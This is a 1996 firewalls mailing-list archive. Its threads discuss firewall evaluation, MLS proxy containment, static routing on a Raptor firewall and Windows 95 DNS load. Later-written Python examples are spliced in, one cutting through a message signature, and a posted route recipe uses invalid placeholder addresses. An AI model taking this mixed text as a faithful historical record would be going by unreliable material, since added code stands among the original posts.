> > If we compete with them, we'll always have a good margin.
> >
> > Leroy
>
> Leroy,
>
> I suspect that this was sent to firewalls in error, but some confusion needs
> to be cleared up now that it has.
>
> The Harris Night Hawk is a symmetric multiple processing computer,
> the price varying according to configuration.
>
> The CyberGuard (Harris' firewall product) comes in for considerably less
> than 100K.
> Regards
> Jon

From firewalls-owner Sat Feb 3 07:08:36 1996
From: Frank Willoughby
To: "Dan Vukelich"
Cc: firewalls@GreatCircle.com
Subject: Re: Survey
Date: Sat, 3 Feb 96 09:56:31 -0500
Message-Id: <9602031456.AA12293@su1.in.net>

At 04:46 PM 2/2/96 -0500, Dan Vukelich wrote:

8< [snip]
>First, I'm looking for is an independent study of firewall products, with
>columns such as "provides packet filtering," "supports IPX," etc.
8< [snip]

Danny,

Here are four sources for you to check out:

1) CSI (Computer Security Institute) put out a firewall comparison chart in the Spring 1995 Computer Security Journal (Volume XI, Number 1). They sponsor seminars & conferences on Information Security. FWIW, they are sponsoring a Network Security (NETSEC) conference in early June. I understand that the topic of firewalls crops up a couple of times in their agenda. You can contact them at (415) 905-2626 for subscription and membership information.

2) Info Security News put out an article entitled "Shopping for Firewalls". The article has a small chart which compares 26 different vendors. This is a good magazine about Information Security. Many of the vendors who are listed in their brief comparison are including a reprint of the article in their brochures. Contact Info Security News at (508) 879-9792 for subscription information.
3) The Free Internet Firewall Checklist is @150 lines in a spreadsheet which may be used in evaluating firewalls. It is easily modifiable so that you can put in evaluation criteria which are important to *you*. It is free (nice price) and available from Fortified Networks: http://www.fortified.com/fortified

4) The Internet Firewall Evaluator is available from Fortified Networks. Good stuff (but then I am somewhat biased). Further information about this can be found at: http://www.fortified.com/fortified

NOTES: Items 1 & 2 are a brief comparison of the vendors' products - based on information which the vendors have supplied. Items 3 & 4 provide the questions in a spreadsheet for an easy comparison of firewall vendors based on criteria which are important to *you*.

The most important criteria in evaluating firewalls are *your* criteria. Decide the value of the data/networks to be protected, the level of protection you want and how much you are willing to spend to provide this protection. Use this as your first step in sifting through the vendors.

FWIW, if it was me (which it isn't) and I had a requirement that needed people to access my internal systems from the Internet (ftp, telnet, e-mail, etc), I wouldn't touch any product which didn't offer user->firewall encryption. Sadly, only a handful of vendors offer this capability.

I hope the above information was useful to you. Good luck in selecting the right firewall for your company.

>Danny

Best Regards,

Frank

The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.

Fortified Networks Inc.
- Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified
Home of the Free Internet Firewall Evaluation Checklist

From firewalls-owner Sat Feb 3 07:42:20 1996
From: "Douglas M. Todd, Jr."
Organization: fc.com
To: firewalls@GreatCircle.COM
Subject: I am looking for someone in the Mass Area who is an expert
Date: Sat, 03 Feb 1996 10:34:03 -0500
Message-ID: <3113806B.199B@fc.com>

at ip routing? Does anyone have any connections?

Douglas Todd

--
Douglas M. Todd, Jr.
fc.com, Inc.
One Federal Street BLD 102
Springfield, MA 01105
PHN: 413-733-7333
FAX: 413-733-7725
Email: Doug@fc.com or Bunyan@msn.com

From firewalls-owner Sat Feb 3 09:38:42 1996
From: jeromie@garrison.com (Jeromie Jackson)
To: firewalls@greatcircle.com, jgt10@amdahl.com
Subject: Re: Mandatory protection (was: product selection)
Date: Sat, 3 Feb 96 11:19:37 CST
Message-Id: <9602031719.AA11917@garrison.com.>

> Jeromie Jackson wrote:
> > I would propose a different use for the MLS architecture.
> >
> >     outside---o.proxies----i.proxies-----inside
> >
> > o.proxies have level of '1'.
> > i.proxies have level of '2'.
> >
> > o.proxies do not have access to write to the inside ethernet interface.
> > i.proxies have privilege to read o.proxies based on label being
> > dominant.
> >
> > From what I see, this would make a connection-based attack useless.
> > You could break into the firewall and subvert the o.proxies. Data-based
> > attacks could potentially succeed if neither proxies noticed the signature.
> > Connection based attacks would be limited to harming the level '1' environment.
> >
> > I would be interested in hearing comments...
>
> jgt10@amdahl.com wrote:
> About 4 years ago I worked with a group of engineers to design an
> internet firewall using a B1 operating system. We thought of the
> above idea, almost exactly.
>
> level
>
> SYSHI - audit data, sources
> RESTRICTED - sys admin sources, tools
> USER - Access to internal network,
> NETWORK - Access to external/internet
> SYSTEM - Executables, configurations, reference data
>
> The more we looked at how to implement that architecture and
> provide other user services the more complicated the picture became.
> We knew we would have to re/train the users in MLS concepts and what
> new functions they would need to understand and use to get data from
> one level to another.

In a firewall situation, one that does not require users on the box, how do you see such a model being implemented?
With the fully transparent products in the market now, if they were to support an MLS architecture like the above, I believe you would have a higher level of integrity of the box. Attacks that were successful would be severely dampened in regard to network threats (as outside processes cannot speak to internal sides of the IP stack).

The MLS architecture appears to be a much more bullet-proof mechanism to implement containment (in comparison to chroot() setuid()).

Would be very interested to hear your comments...

Jeromie Jackson
Director of Technology
Garrison Associates
jeromie@garrison.com

From firewalls-owner Sat Feb 3 12:38:31 1996
From: Paul Ferguson
To: firewalls@GreatCircle.com
Subject: CNN on Mitnick
Date: Sat, 03 Feb 1996 15:13:36 -0500
Message-Id: <199602032012.MAA22661@lint.cisco.com>

For what it's worth, CNN had a 5 minute segment on two books which are in print about Tsutomu Shimomura and Kevin Mitnick.

See: http://www.cnn.com/CNN/Programs/CompConn/index.html

- paul

--
Paul Ferguson
Consulting Engineering
Reston, Virginia USA
tel: +1.703.716.9538
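As an added example (written for this archive, not code from the thread or from any product or B1 system named in it), the following Python model shows the label rules Jeromie Jackson sketches and jgt10@amdahl.com's group considered. Labels carry a hierarchical level plus an optional set of categories, as in a standard MLS lattice; a read is allowed only when the reader's label dominates the object's, and, to match the design's requirement that o.proxies cannot write to the inside interface, a write is confined to the subject's own label (stricter than Bell-LaPadula's "write up"). The numeric labels, the object names, and the `OBJECTS` table are assumptions taken from the sketch; `write_reachable` lists what a subverted o.proxies could still write to, which is the "limited to the level '1' environment" argument.

```python
"""Added example: lattice-based label checks for the proxy-containment
design discussed in the thread. Labels and rules follow the posted sketch
(o.proxies at level 1, i.proxies at level 2, reads by dominance, no writes
across labels); nothing here is from a real MLS product."""
from dataclasses import dataclass
from typing import FrozenSet


@dataclass(frozen=True)
class Label:
    level: int                                  # hierarchical sensitivity level
    categories: FrozenSet[str] = frozenset()    # compartments, may be empty

    def dominates(self, other: "Label") -> bool:
        """MLS dominance: level at least as high AND categories a superset."""
        return self.level >= other.level and self.categories >= other.categories


def can_read(subject: Label, obj: Label) -> bool:
    """Simple-security rule: read only what your label dominates (no read up)."""
    return subject.dominates(obj)


def can_write(subject: Label, obj: Label) -> bool:
    """Write rule used by the posted design: only objects at exactly the
    subject's own label. Bell-LaPadula would permit writing up; the poster
    explicitly wants o.proxies unable to write the inside interface, so
    writes are confined to the subject's level."""
    return subject == obj


# Assumed labels from Jeromie Jackson's sketch (constructed values).
OUTSIDE_IF = Label(1)
O_PROXIES = Label(1)
I_PROXIES = Label(2)
INSIDE_IF = Label(2)

OBJECTS = {
    "outside_if": OUTSIDE_IF,
    "o.proxies": O_PROXIES,
    "i.proxies": I_PROXIES,
    "inside_if": INSIDE_IF,
}


def containment_checks() -> dict:
    """The access decisions the thread reasons about, keyed by description."""
    return {
        "i.proxies read o.proxies": can_read(I_PROXIES, O_PROXIES),       # 2 dominates 1
        "o.proxies read i.proxies": can_read(O_PROXIES, I_PROXIES),       # no read up
        "o.proxies write inside if": can_write(O_PROXIES, INSIDE_IF),     # the key containment
        "o.proxies write outside if": can_write(O_PROXIES, OUTSIDE_IF),   # its own level
        "i.proxies write inside if": can_write(I_PROXIES, INSIDE_IF),
    }


def write_reachable(subject: Label, objects: dict = OBJECTS) -> list:
    """Names of objects a (possibly subverted) subject could still write to:
    the blast radius of a successful connection-based attack on that subject."""
    return sorted(name for name, lab in objects.items() if can_write(subject, lab))


if __name__ == "__main__":
    for desc, allowed in containment_checks().items():
        print(f"{desc:30s} {'allowed' if allowed else 'DENIED'}")
    print("subverted o.proxies can write:", write_reachable(O_PROXIES))
```

The categories field is what lets the same check express jgt10's compartmented layout (audit data, admin tools, network access) without changing the rules: a subject at level 2 with category "net" dominates a plain level 2 object, but not the reverse.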
e-mail: pferguso@cisco.com
cisco Systems

From firewalls-owner Sat Feb 3 12:53:41 1996
From: Alan Hannan
To: jtriana@adp-es.com (Jorge Triana)
Cc: firewalls@GreatCircle.COM
Subject: Re: Help with Sun-OS/Raptor Firewall
Date: Sat, 3 Feb 1996 14:26:42 -0600 (CST)
Message-Id: <199602032026.OAA10492@westie.gi.net>
In-Reply-To: <1126f930@adp-es.com> from "Jorge Triana" at Feb 2, 96 02:58:05 pm

......... Jorge Triana is rumored to have said:

] I have a Raptor Eagle 3.0 firewall running on a Sun SparcStation 2.0
] running SunOS 4.1.4, (SOLARIS VERSION COMING SOON).
] The machine has two token ring cards, one for each of the net sides,
] unprotected and protected).

Hmm. I wonder why you purchased a Raptor firewall?

] On the protected internal network side, I have a cisco router that is
] my gateway to the rest of the internal network. I am running IGRP in
] the internal network and also RIP on that router so that all my
] routing tables are redistributed into the ring where the Sun is
] connected to.

Are you expecting your raptor firewall to route? I don't think a self-respecting firewall will route packets, though all must route the packets wrt the kernel origin; hopefully they won't listen to routing protocols. Ask Marcus why, he'll tell us a nice story, methinks.
] On the unprotected side going to the internet, I have another cisco
] router running rip and going out to the rest of the world.

Rip? IGRP? Would you really trust your firewall to a silly routing protocol?

] From the SUN workstation, I can ping to the outside world, internet
] and such without a problem. I have routes to the rest of the world.

Yah, that's your default.

] I can't however, ping anything beyond my directly connected devices
] that are on the protected ring. That is, any other subnet that is not
] directly connected to the subnet where the sun is, is not accessible.

Right. What you need to do is manually add the routes. Throw them into /etc/netstart, and off you go.

Like so, I think:

in file /etc/netstart, put the following type lines after:

    route -n flush
    route -n add default 266.1.1.1     # <- assuming this is the external unprotected router
    route -n add 10.0.0.0 277.1.1.1    # <- assuming your internal network is 10/8 and sent to the router 277.1.1.1

Now, your firewall knows how to get there (after rebooting, of course, else you can add the routes manually, no problem).

I really hope you're not running routed on your app-gw firewall, though, but what do I know?
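As an added example, and not Alan's or anyone else's script from this thread, here is a Python check that a dual-homed application-gateway firewall's static routes make sense before they go into the boot script (/etc/rc.local on SunOS 4.1.x, as the follow-up to this message points out). The interface and gateway addresses are constructed placeholders; the point is that a gateway must sit on a directly connected subnet or the kernel rejects the route, and that the "assuming" addresses in a recipe like the one above (266.x, 277.x are not valid IPv4) get caught before anyone types them into a production box. The `route -n add` lines it emits use the same form as the posting.

```python
"""Added example: sanity-check static routes for a dual-homed firewall
before writing them to the boot script. Addresses are constructed."""
import ipaddress

# Constructed: the firewall's two interfaces as address/prefix strings.
INTERFACES = {
    "le0 (unprotected)": "192.0.2.2/24",
    "le1 (protected)":   "10.1.1.2/24",
}

# Constructed: routes we intend to add; "default" goes to the outside router.
ROUTES = [
    ("default", "192.0.2.1"),
    ("10.0.0.0/8", "10.1.1.1"),
]


def gateway_interface(gateway, interfaces=INTERFACES):
    """Return the interface whose subnet contains the gateway, or None.
    A next hop that is not on a directly connected subnet is unusable:
    'route add' fails, or worse, silently points at the wrong side."""
    gw = ipaddress.ip_address(gateway)
    for name, cidr in interfaces.items():
        iface = ipaddress.ip_interface(cidr)
        if gw in iface.network and gw != iface.ip:
            return name
    return None


def check_routes(routes=ROUTES, interfaces=INTERFACES):
    """Validate each (destination, gateway) pair.

    Returns (commands, problems): commands are the 'route -n add' lines for
    the boot script, problems are human-readable reasons a route was rejected."""
    commands, problems = [], []
    for dest, gateway in routes:
        try:
            ipaddress.ip_address(gateway)            # rejects e.g. 266.1.1.1
            if dest != "default":
                ipaddress.ip_network(dest, strict=True)   # host bits must be zero
        except ValueError as exc:
            problems.append(f"{dest} via {gateway}: {exc}")
            continue
        via = gateway_interface(gateway, interfaces)
        if via is None:
            problems.append(f"{dest} via {gateway}: gateway not on a connected subnet")
            continue
        # The posted route(8) form takes a bare network address, not CIDR.
        target = dest if dest == "default" else str(ipaddress.ip_network(dest).network_address)
        commands.append(f"route -n add {target} {gateway}   # via {via}")
    return commands, problems


if __name__ == "__main__":
    cmds, probs = check_routes()
    print("route -n flush")
    for line in cmds:
        print(line)
    for p in probs:
        print("REJECTED:", p)
```

Run against the constructed tables it emits the two route lines; feed it `("default", "266.1.1.1")` and it reports the invalid address instead, and a valid-looking gateway on the wrong side (say 10.2.2.1 when the inside interface is 10.1.1.2/24) is reported as not directly connected.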
-alan 'firewall lackey'

From firewalls-owner Sat Feb 3 14:59:37 1996
From: Darren Reed
To: alan@gi.net (Alan Hannan)
Cc: jtriana@adp-es.com, firewalls@GreatCircle.COM
Subject: Re: Help with Sun-OS/Raptor Firewall
Date: Sun, 4 Feb 1996 09:50:24 +1100 (EDT)
Message-Id: <199602032250.OAA10172@miles.greatcircle.com>
In-Reply-To: <199602032026.OAA10492@westie.gi.net> from "Alan Hannan" at Feb 3, 96 02:26:42 pm

In some mail from Alan Hannan, sie said:
[...]
> Right. What you need to do is manually add the routes. Throw
> them into /etc/netstart, and off you go.

/etc/rc.local for SunOS4.1.x (/etc/netstart is new to 4.4BSD).

> Like so, I think:
>
> in file /etc/netstart, put the following type lines after:
>
> route -n flush
> route -n add default 266.1.1.1    # <- assuming this is the
>                                        external unprotected
>                                        router
> route -n add 10.0.0.0 277.1.1.1   # <- assuming your internal
>                                        network is 10/8 and sent
>                                        to the router 277.1.1.1

darren

From firewalls-owner Sat Feb 3 18:38:32 1996
Date: Sat, 3 Feb 1996 21:33:25 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Subject: H-H-H-H-He's backkkkk
Message-Id: <960203213325.202138aa@hobbes.orl.mmc.com>

>Subj: CNN on Mitnick
>For what its worth, CNN had a 5 minute segment on two books which are
>in print about Tsutomu Shimomura and Kevin Mitnick.

Somehow this whole situation reminds me of the old saw "anyone who wants to be a politician, shouldn't." How come the people who get the "rich and famous" contracts are those who create an "attractive nuisance", those who are attracted to them, and those who have access to national tabloids disguising themselves as newspapers? In the meantime, for those who do their job properly, nothing happens and employers wonder why they are paying them.

Sometimes it seems that in order to be a "designated hero", you need a disaster which teaches that it is self-defeating to prevent the disaster in the first place. After all, where would David Sarnoff have been without the Titanic? (Of course, it helps if you can write the history books too).

Warmly,
Padgett

ps the real import of the MasterCard/Visa/Microsoft/Netscape accord is in the XIII (b) exclusions from ITAR. Take a look.
From firewalls-owner Sun Feb 4 06:23:24 1996
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: Negative impact of Windows 95 on firewall performance
Date: Sun, 4 Feb 1996 09:05:21 -0500 (EST)

Following my previous post, below is my understanding of a network problem that has been created by Microsoft and which has an impact on many firewalls running DNS. This understanding is based in large part on the responses to my previous posting.

Now that the problem has been identified, I would like to hear as many known solutions to the problem as possible.

Windows 95 machines and some Windows NT machines are connecting to the DNS system on many company firewalls in an attempt to resolve NetBIOS names. The DNS lookup always fails, because DNS does not work with NetBIOS names, and the process places unnecessary administrative overhead on the firewall. The known result of this kind of unnecessary overhead is that data throughput drops and it takes longer to establish connections that involve a DNS lookup.

The IP stack in Windows 95 allows a machine to use DNS as a last resort in resolving NetBIOS names. On early versions there was an advanced setup screen which had a tick box "Use DNS for NetBIOS" which allowed the user to disable this feature; it was enabled by default.
On the present Win95 stack an entire subsection of the IP set up relating to low-level NetBIOS/IP has been completely eliminated, so there is no longer a tick box. The subsection that was eliminated also contained the "Enable WINS Proxy" flag.

Every DNS query from a Windows 95 machine fails on the firewall DNS, which currently will NOT cache a negative answer, so all such requests will be passed all the way up the DNS tree. During peak periods of Windows 95 DNS requests to resolve NetBIOS names, as many as 8 DNS requests per second may be made to the firewall.

What are the possible solutions to this problem?

Sick Puppy, the Cat_Eating_Dawg
the Church of the Dead Meow
Experimental Cryogenics

From firewalls-owner Sun Feb 4 08:53:32 1996
From: Mike Culver
To: Sick Puppy
Cc: firewalls@greatcircle.com
Subject: Re: Negative impact of Windows 95 on firewall performance
Date: Sun, 04 Feb 1996 08:39:06 -0800
Message-Id: <2.2.32.19960204163906.00698424@ncelec.com>

At 09:05 AM 2/4/96 -0500, you wrote:
> Every DNS query from a Windows 95 machine fails on the firewall DNS
> which currently will NOT cache a negative answer, so all such requests
> will be passed all the way up the DNS tree. During peak periods of
> Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS
> requests per second may be made to the firewall.
I'm not so certain about the above statement -- if the "Computer Name" is listed in hosts, I'm fairly certain that the entry works.

So perhaps the solution is to run an INTERNAL DNS server that passes DNS down from the firewall, but never hands internal host names back up. (And, of course) lists all the WIN95 computer names with their addresses.

From firewalls-owner Sun Feb 4 09:14:55 1996
From: Ed Woodrick
To: "firewalls@GreatCircle.com"
Subject: RE: Negative impact of Windows 95 on firewall performance
Date: Sun, 4 Feb 1996 11:42:42 -0500

I would suggest that you first get the Win95 and WINNT resource kits. They go into detail as to what is going on and what should be done in certain situations.

The easiest solution is to enable a DHCP/WINS server set and set broadcasts to P-Node (I believe) so that the resolution goes to the WINS server and then to broadcast.
And not to use WINS for Netbios resolution. This will substantially reduce network broadcasts.

You are complaining about your DNS server getting, I believe, 10-15,000 hits per day. This, I don't believe, is a large number, but if you believe that you are getting firewall performance problems, then just add another DNS server onto the network. Of course, anyone who designs a network correctly will already have two DNS servers, and what you should do is to point the workstations to the non-firewall DNS.

As to the whole reason why NBT (Netbios over TCP/IP) is trying to resolve names, I am assuming that you don't have Netbios installed, or don't have it selected as the default protocol, and you have the TCP/IP stack installed. What you are seeing is the NBT trying to resolve names. In Netbios, all that it needed to do was broadcast, but NBT can't trust broadcast, the routers won't let it through, NBT has to go a little further. This is where WINS comes in. NBT can be set up to ask WINS (the Netbios equivalent of DNS, but dynamic instead of static) where other stations are. And DHCP can be used to configure the workstations to use the correct WINS server and the correct name resolution type.

Me personally, I am ever so thankful that Microsoft made NBT so flexible and reliable. If I don't think about what I am doing, NBT will find some way to resolve the names. If I want to reduce network traffic, then I can make some changes, add a WINS and drastically reduce the broadcast traffic. WINS also supports dynamic allocation and doesn't require, like DNS, manual entry of all workstations.

BTW, if you look at the DNS requests, you'll see that you could probably decrease the traffic by actually putting in the queries that are being asked for. One prime query is for the Domain and the Domain Servers on an NT network. Or in a non-NT network, the addresses of the servers.
Of course if you were looking at a UNIX network, you would have to put these addresses in, so Microsoft is making your job easier by giving you the option.

Ed Woodrick

----------
From: Sick Puppy[SMTP:sikpuppy@maestro.com]
Sent: Sunday, February 04, 1996 9:05 AM
To: firewalls@GreatCircle.com
Subject: Negative impact of Windows 95 on firewall performance

Following my previous post, below is my understanding of a network problem that has been created by Microsoft and which has an impact on many firewalls running DNS. This understanding is based in large part on the responses to my previous posting.

Now that the problem has been identified, I would like to hear as many known solutions to the problem as possible.

Windows 95 machines and some Windows NT machines are connecting to the DNS system on many company firewalls in an attempt to resolve NetBIOS names. The DNS lookup always fails, because DNS does not work with NetBIOS names, and the process places unnecessary administrative overhead on the firewall. The known result of this kind of unnecessary overhead is that data throughput drops and it takes longer to establish connections that involve a DNS lookup.

The IP stack in Windows 95 allows a machine to use DNS as a last resort in resolving NetBIOS names. On early versions there was an advanced setup screen which had a tick box "Use DNS for NetBIOS" which allowed the user to disable this feature; it was enabled by default. On the present Win95 stack an entire subsection of the IP set up relating to low-level NetBIOS/IP has been completely eliminated, so there is no longer a tick box. The subsection that was eliminated also contained the "Enable WINS Proxy" flag.

Every DNS query from a Windows 95 machine fails on the firewall DNS, which currently will NOT cache a negative answer, so all such requests will be passed all the way up the DNS tree.
During peak periods of Windows 95 DNS requests to resolve NetBIOS names, as many as 8 DNS requests per second may be made to the firewall.

What are the possible solutions to this problem?

Sick Puppy, the Cat_Eating_Dawg
the Church of the Dead Meow
Experimental Cryogenics

From firewalls-owner Sun Feb 4 09:38:36 1996
From: "Russ.Cooper@RC.Toronto.on.ca"
To: "'Sick Puppy'"
Cc: "'Firewalls'"
Subject: RE: Negative impact of Windows 95 on firewall performance
Date: Sun, 4 Feb 1996 12:27:10 -0500
Message-ID: <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca>

The solution is to put in an NT WINS server and have all your Win95 machines configured to use that WINS server. This will prevent the machines from using DNS to resolve NetBIOS names.

As I suggested this before, I assume you want to know what to do if you do not have an NT WINS Server, is this correct?

The simple answer, if the above assumption is correct, is to unbind the Client for Microsoft Networks from the TCP/IP protocol, and use NetBEUI or IPX/SPX as the only protocol for Client for Microsoft Networks. NetBIOS will not be carried over TCP/IP in that case, and DNS resolution will never come into play.
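As an added example, not from any post in this thread, here is a small Python detector for the symptom Sick Puppy describes and the replies above aim to remove: bursts of single-label (NetBIOS-style) name lookups from individual clients, with the same failing name repeated because the firewall's DNS keeps no negative cache. The log format is an assumed BIND-style "client <ip>#<port>: query: <name> IN <type>" line and every host, name and timestamp in `SAMPLE_LOG` is constructed; the heuristics (no dots in the name, at most 15 characters, several queries in one second, repeats of the same name) come from the thread. Running it before and after pointing the Win95 boxes at WINS, or unbinding Client for Microsoft Networks from TCP/IP, shows whether the fix actually took.

```python
"""Added example: flag NetBIOS-style name lookups hammering a firewall DNS,
from query-log lines. Log format, hosts and timestamps are constructed."""
import re
from collections import Counter, defaultdict

# Constructed sample in an assumed BIND-style query-log format.
SAMPLE_LOG = """\
03-Feb-1996 09:00:00.101 client 10.1.1.50#1025: query: WKSTN01 IN A
03-Feb-1996 09:00:00.230 client 10.1.1.50#1026: query: ACCOUNTS IN A
03-Feb-1996 09:00:00.340 client 10.1.1.50#1027: query: WKSTN01 IN A
03-Feb-1996 09:00:00.455 client 10.1.1.50#1028: query: ACCOUNTS IN A
03-Feb-1996 09:00:00.560 client 10.1.1.50#1029: query: WKSTN01 IN A
03-Feb-1996 09:00:00.670 client 10.1.1.50#1030: query: PRINTSRV IN A
03-Feb-1996 09:00:00.780 client 10.1.1.50#1031: query: WKSTN01 IN A
03-Feb-1996 09:00:00.890 client 10.1.1.50#1032: query: ACCOUNTS IN A
03-Feb-1996 09:00:01.020 client 10.1.1.50#1033: query: WKSTN01 IN A
03-Feb-1996 09:00:01.500 client 10.1.1.77#1040: query: www.greatcircle.com IN A
03-Feb-1996 09:00:02.000 client 10.1.1.77#1041: query: ftp.cert.org IN A
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\d\d:\d\d:\d\d)\.\d+ client (?P<client>[\d.]+)#\d+: "
    r"query: (?P<name>\S+) IN (?P<qtype>\S+)$"
)


def looks_like_netbios(name):
    """NetBIOS names are at most 15 characters and carry no dots, so DNS sees
    a single label. A Win95 box may also append its DNS suffix; that variant
    is deliberately left out to keep the rule conservative."""
    return "." not in name and len(name) <= 15


def parse(log_text):
    """Yield (second, client, name) for each parsable line; skip the rest."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["date"] + " " + m["time"], m["client"], m["name"]


def analyse(log_text, burst_threshold=5):
    """Per-client findings: peak queries in any one second, total NetBIOS-style
    queries, and how many were repeats of a name already asked for (the load
    a negative cache would have absorbed). 'burst' marks clients that hit the
    threshold while sending NetBIOS-style names."""
    per_second = defaultdict(Counter)   # client -> Counter(second)
    nb_names = defaultdict(Counter)     # client -> Counter(name)
    for second, client, name in parse(log_text):
        per_second[client][second] += 1
        if looks_like_netbios(name):
            nb_names[client][name] += 1
    findings = {}
    for client, secs in per_second.items():
        peak = max(secs.values())
        names = nb_names.get(client, Counter())
        total_nb = sum(names.values())
        repeats = sum(n - 1 for n in names.values())
        findings[client] = {
            "peak_per_second": peak,
            "netbios_queries": total_nb,
            "repeated_netbios_queries": repeats,
            "burst": peak >= burst_threshold and total_nb > 0,
        }
    return findings


if __name__ == "__main__":
    for client, f in analyse(SAMPLE_LOG).items():
        flag = "BURST" if f["burst"] else "ok"
        print(f"{client:12s} peak/s={f['peak_per_second']} netbios={f['netbios_queries']} "
              f"repeats={f['repeated_netbios_queries']} {flag}")
```

In the constructed sample the Win95-style client peaks at 8 queries in one second, the figure the original post quotes, and six of its nine NetBIOS-style lookups are repeats; the ordinary client resolving real hostnames is not flagged.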
Cheers,
Russ Cooper, Senior Consultant - Internet
SHL/Computer Innovations - Consulting Services
Russ.Cooper@RC.Toronto.On.Ca - RWCooper@SHL.Com
"Do you have the vision to see my future as I have projected it?"

From firewalls-owner Sun Feb 4 11:54:00 1996
From: Sick Puppy
To: "Russ.Cooper@RC.Toronto.on.ca"
Cc: "'Firewalls'"
Subject: RE: Negative impact of Windows 95 on firewall performance
Date: Sun, 4 Feb 1996 13:30:41 -0500 (EST)
In-Reply-To: <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca>

> As I suggested this before, I assume you want to know what to do if you do
> not have an NT WINS Server, is this correct?

Enlightenment slowly cleared the confused mind of the stupid dawg. Well, yes. I sincerely appreciate your advice. So will the other dawgs I was talking to, on account of we was all confused together.
Sick Puppy
cDm

From firewalls-owner Sun Feb 4 12:08:23 1996
From: Wally the Craw Wurm
To: firewalls@GreatCircle.com
Subject: CERN httpd man page
Date: Sun, 04 Feb 1996 14:53:28 -0600
Message-Id: <1.5.4b11.32.19960204205328.00680500@192.168.2.100>

Is there a man page for the cern httpd? All my searches for it come up with nothing but binaries.

Thanks
Jeremy Lundin

------------------------------------------------------------------------------
You have been touched by the wisdom of Wally the Craw Wurm. Be proud.
Jer Lundin                       Email: jlundin@indiana.edu
300 East Matlock, Apt. #26       WWW: Coming Soon!
Bloomington, IN 47408            Voice: (812)336-5444
------------------------------------------------------------------------------

From firewalls-owner Sun Feb 4 13:38:23 1996
From: Tony Ferro
To: firewalls@GreatCircle.COM
Subject: Re: PC based sniffer
Date: Sun, 4 Feb 1996 16:20:02 -0500 (EST)
Message-Id: <199602042120.QAA11458@raptor1.raptor.com>

Hi Folks,

I've seen responses for ethernet sniffers, is there any software available for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer and its trace features are pretty limited - can count IP pkts, but can't see inside them.
TIA,
Tony

From firewalls-owner Sun Feb 4 14:26:37 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08813 for firewalls-outgoing; Sun, 4 Feb 1996 14:11:40 -0800 (PST)
Received: from ilinx.ilinx.com (ilinx.bctel.net [204.174.66.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08795 for ; Sun, 4 Feb 1996 14:11:25 -0800 (PST)
Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Sun, 4 Feb 96 14:10 PST
Message-Id:
From: brian@ilinx.ilinx.com (Brian J. Murrell)
Date: Sun, 4 Feb 1996 14:10:10 -0800 (PST)
To: firewalls@GreatCircle.COM
Reply-To: brian@ilinx.bctel.net, brian_murrell@bctel.net
Subject: anybody know of any vulnerabilities with "echo"
X-Mailer: Ishmail 1.2-960125-386
MIME-Version: 1.0
Content-Type: text/plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi Folks,

At a particular Internet firewall I administer, I've noticed a rash of "echo" (udp port 7) service attempts. These came on pretty suddenly (as if a whole shwack of people found something out) and are pretty constant now.

I'm wondering if a new vulnerability with the (a particular implementation maybe) echo server has been found.

Anybody else notice this trend??

b.
--
Brian J. Murrell                        brian@ilinx.com
InterLinx Support Services, Inc.        brian@wimsey.com
North Vancouver, B.C.
604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Sun Feb 4 14:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08854 for firewalls-outgoing; Sun, 4 Feb 1996 14:14:32 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08847 for ; Sun, 4 Feb 1996 14:14:28 -0800 (PST) Received: from pferguso-pc.cisco.com (c3robo12.cisco.com [171.68.13.76]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id OAA04169; Sun, 4 Feb 1996 14:11:03 -0800 Message-Id: <199602042211.OAA04169@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 17:11:41 -0500 To: Tony Ferro From: Paul Ferguson Subject: Re: PC based sniffer Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Tony. How's it going at Raptor? - paul At 04:20 PM 2/4/96 -0500, Tony Ferro wrote: >Hi Folks, > >I've seen responses for ethernet sniffers, is there any software available >for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer >and its trace features are pretty limited - can count IP pkts, but can't >see inside them. > >TIA, >Tony > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. 
